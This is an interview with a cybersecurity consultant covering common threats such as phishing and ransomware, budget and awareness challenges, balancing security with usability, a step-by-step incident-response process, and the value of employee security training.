In an era where technology plays a crucial role in our lives and businesses, cybersecurity has become a top priority. To shed light on the importance of IT security and the challenges faced by organisations today, we had the privilege of sitting down with Simon Rosemeyer, a cybersecurity expert and the founder of Nexgen Cyber, an IT security consultancy. In this interview, Simon shares his insights on the current cybersecurity landscape, the emerging trends and threats, and the steps businesses can take to mitigate risks and safeguard their digital assets.

What initially drew you towards a career in cybersecurity?

Throughout my 35 years of experience in the industry, I have witnessed significant technological advancements over the decades. However, one glaring issue became apparent: while technology progressed rapidly, we failed to keep pace with security measures. As a result, we now face the challenge of bridging the gap between rapidly advancing technologies and the need for robust security.

In recent times, the situation has become even more complex. The COVID-19 pandemic forced organisations to adopt remote work models, which further dispersed the workforce. This introduced a whole new set of security concerns, as we had to secure home devices, mobile devices (both business and personal), and address the vulnerabilities brought by IoT devices. It has become a relentless challenge to ensure the security of these diverse environments.

Recognising the urgency to bring security up to date, I embarked on a journey into the world of cybersecurity eight years ago. I understood that security needed to catch up with the rapid technological advancements we were witnessing. My motivation was to contribute my expertise and knowledge to help organisations navigate this ever-changing cyber landscape and safeguard their critical assets.

As we embrace the opportunities and innovations brought by modern technologies, it is crucial to prioritise security at every step. By staying abreast of the latest security trends, emerging threats, and industry best practices, we strive to bridge the gap between technology and security. Our aim is to help organisations develop robust security strategies, implement effective controls, and build a culture of cybersecurity resilience.

The challenges we face today are vast, encompassing a diverse range of technologies, remote work models, and evolving threat landscapes. By continuously adapting and growing in the field of cybersecurity, we are committed to contributing our experience and expertise to tackle these challenges head-on, ensuring that organisations can leverage technology securely and protect their valuable assets.

What are the most common cyber threats that organisations face today, and how do you keep up with new threats as they emerge?

Organisations today face a wide range of cyber threats, and it’s important to stay vigilant and proactive in defending against the threat actors. But the two common cyber threats that organisations face are:

Phishing Attacks: (Business Email Compromise) Phishing is a method used by the threat actors to trick individuals into sharing sensitive information such as passwords, credit card numbers, or personal data. These attacks often come in the form of deceptive emails, websites, or messages and is one of the most significant threats to organisations today.

Ransomware: Ransomware is a type of malware that encrypts a victim’s files and demands a ransom in exchange for restoring access to the data. It can spread through malicious email attachments, infected websites, or compromised networks.

What is the biggest cyber security challenge that you face?

One of the most significant challenges in cybersecurity is the need to instil a serious mindset towards security within organisations. It involves overcoming obstacles such as organisations underestimating the importance of cybersecurity, convincing them to allocate appropriate budgets for security measures, and witnessing situations where organisations fail to act on recommended security practices only to face a breach and then seek assistance.

In the realm of cybersecurity, the primary challenge lies in raising awareness and convincing organisations to prioritise security as a critical aspect of their operations. It requires overcoming complacency and promoting a proactive approach to protect valuable assets and sensitive information.

Another major hurdle is securing adequate budgets for cybersecurity initiatives. Many organisations struggle to allocate sufficient resources to address evolving threats and implement robust security measures. Convincing decision-makers to invest in cybersecurity, despite competing priorities, can be a daunting task.

Additionally, there are instances where security professionals provide recommendations and guidance to organisations, only to witness those organisations ignore the advice. It becomes disheartening to see those organisations fall victim to breaches or cyber incidents and then seek assistance retrospectively.

Addressing these challenges requires a multi-faceted approach. Ultimately, the goal is a culture of security awareness, where organisations consistently prioritise cybersecurity, allocate appropriate budgets, and act upon the recommendations provided by security professionals to mitigate risks effectively.

How do you balance the security needs of an organisation and the need for productivity and usability by employees and customers?

Striking the right balance between security, productivity, and usability is an ongoing process that requires continuous evaluation, adaptation, and collaboration across the organisation.

Adopt a risk-based approach to security, where the level of security measures and controls is commensurate with the identified risks. Conduct a thorough risk assessment to understand the potential threats, vulnerabilities, and impact to the organisation. This allows you to prioritise security measures based on the level of risk they address.

With the rise of remote work, establish secure remote access solutions that enable employees to work efficiently while maintaining security. Implement Virtual Private Networks (VPNs), secure cloud-based collaboration tools, and endpoint security measures to protect data and systems accessed remotely. Consider multi-factor authentication (MFA) options that provide an additional layer of security without significantly impeding productivity.

It is also important to Involve employees and customers in the security process by promoting awareness, education, and engagement. Communicate the importance of security practices and their impact on productivity and usability.

Lastly encourage feedback and suggestions on security measures, seeking input on usability concerns or potential enhancements. This collaborative approach helps ensures that security measures are aligned with the needs of the organisation.

Can you walk us through a process you would take to investigate a potential security breach or incident?

Investigating a potential security breach or incident requires a systematic and thorough approach to identify the root cause, assess the impact, and take appropriate remedial actions.

General process that can be followed:

Preparation:
a. Assemble an Incident Response Team: Form a team of individuals with relevant expertise, including cybersecurity professionals, IT personnel, legal advisors, and communication specialists. Assign specific roles and responsibilities to team members.
b. Establish an Incident Response Plan: Have a well-defined and documented incident response plan in place that outlines the steps to be taken during a security incident. Ensure that the plan is regularly reviewed and updated to reflect changes in the threat landscape and the organisation’s infrastructure.

Identification and Notification:
a. Detection: Detect the potential security breach or incident through various sources, such as security monitoring systems, alerts from security tools, employee reports, or customer complaints.
b. Initial Assessment: Gather preliminary information about the incident, including the nature of the incident, affected systems, and potential impact.
c. Notification: Inform the necessary stakeholders, such as the Incident Response Team, senior management, legal department, and relevant regulatory authorities, as required by applicable regulations.

Containment:
a. Isolate Affected Systems: Take immediate action to isolate the affected systems or network segments to prevent further damage and limit the scope of the incident.
b. Preserve Evidence: Implement measures to preserve the integrity of potential evidence for forensic analysis. This may involve taking system snapshots, capturing network traffic, or creating disk images.

Investigation:
a. Forensic Analysis: Conduct a detailed forensic analysis to determine the cause of the incident, the extent of the compromise, and the potential impact on data and systems. Collect and analyse relevant logs, artifacts, and other digital evidence.
b. Root Cause Analysis: Identify the root cause of the incident by examining the attack vectors, vulnerabilities, or human errors that led to the breach. Determine if it was an external attack, insider threat, or a combination of factors.
c. Timeline Reconstruction: Develop a timeline of events leading up to and during the incident to understand the sequence of activities and aid in the investigation.
d. Attribution (if applicable): Attempt to attribute the incident to specific threat actors or groups if feasible and relevant to the organisation’s context.

Mitigation and Recovery:
a. Remediation: Develop a plan to mitigate the identified vulnerabilities or weaknesses that allowed the incident to occur. This may involve applying patches, updating configurations, enhancing security controls, or implementing compensating controls.
b. Data Restoration: Restore affected systems and data from clean backups, ensuring the removal of any malicious presence.
c. System Hardening: Strengthen the security posture of the organisation’s systems and network infrastructure to prevent similar incidents in the future. This may include implementing security best practices, conducting security awareness training, and enhancing access controls.

Reporting and Documentation:
a. Incident Report: Prepare a comprehensive incident report documenting the details of the incident, the investigation findings, the actions taken for containment and recovery, and recommendations to prevent future incidents.
b. Lessons Learned: Conduct a post-incident review with the Incident Response Team to identify areas for improvement in incident response processes, security controls, and employee training.

Follow-Up:
a. Continuous Monitoring: Implement measures to monitor the network and systems continuously for any signs of recurring or new security incidents. Update security controls and response plans based on the lessons learned.
b. Communication: Communicate with relevant stakeholders, including employees, customers, partners, and regulatory authorities, about the incident, the actions taken, and any necessary steps they need to follow.

If you could give one recommendation to make a business more secure what would it be?

If I could give one recommendation to make a business more secure, it would be to prioritise and invest in employee cybersecurity awareness and training.

Employees are often the first line of defence against cyber threats, and their actions can significantly impact an organisation’s security posture. By providing comprehensive cybersecurity awareness and training programs, businesses can empower their employees to recognise and respond to potential security risks effectively.

Update on new attack techniques, and emerging security best practices through regular training sessions, newsletters, or online resources.

By investing in employee cybersecurity awareness and training, organisations can build a strong security culture, foster responsible behaviour, and create a workforce that actively contributes to safeguarding the business from cyber threats. Remember, cybersecurity is a collective effort, and well-informed and vigilant employees play a crucial role in protecting the assets and data, they become the organisations human firewall.